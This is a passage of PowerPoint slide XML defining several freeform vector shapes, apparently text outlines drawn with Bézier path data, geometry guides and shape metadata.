                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA3429A1-B8AE-41EE-AF6F-5FA1631EED90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId109"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2097088" y="2317751"/>
              <a:ext cx="47625" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 136"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="39" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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93" name="Freeform 934">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF6F27D-66ED-4793-8CE3-69CCBEFCEE52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId110"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2168526" y="2351088"/>
              <a:ext cx="85725" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 192 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 228 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 206 w 249"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 206 w 249"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 150 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 76 w 249"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 56 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 172 w 249"/>
                <a:gd name="T47" fmla="*/ 19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9" h="218">
                  <a:moveTo>
                    <a:pt x="172" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="183" y="215"/>
                    <a:pt x="192" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="215"/>
                    <a:pt x="249" y="215"/>
                    <a:pt x="249" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="185"/>
                    <a:pt x="236" y="185"/>
                    <a:pt x="229" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="31"/>
                    <a:pt x="143" y="31"/>
                    <a:pt x="150" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="182"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="116" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="188"/>
                    <a:pt x="76" y="171"/>
                    <a:pt x="76" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="5"/>
                    <a:pt x="73" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="76" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="172" y="19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94" name="Freeform 935">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E41EE5A-3ABE-4DDB-A83E-0639A8857C7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId111"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2268538" y="2349501"/>
              <a:ext cx="66675" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="84"/>
                    <a:pt x="30" y="78"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="46"/>
                    <a:pt x="46" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="52" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="130"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="138"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="222"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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95" name="Freeform 936">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF489C06-C8A6-4125-BC88-7965400A0054}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId112"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2355851" y="2349501"/>
              <a:ext cx="71438" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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96" name="Freeform 937">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A97106D-531A-45B4-8791-B4BA8596E012}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId113"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2443163" y="2349501"/>
              <a:ext cx="77788" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="194" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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97" name="Freeform 938">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF31E370-1031-442A-9CFA-5064C69766F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId114"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2549526" y="2317751"/>
              <a:ext cx="46038" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 135 w 136"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 113 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 97 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 113 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 135 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
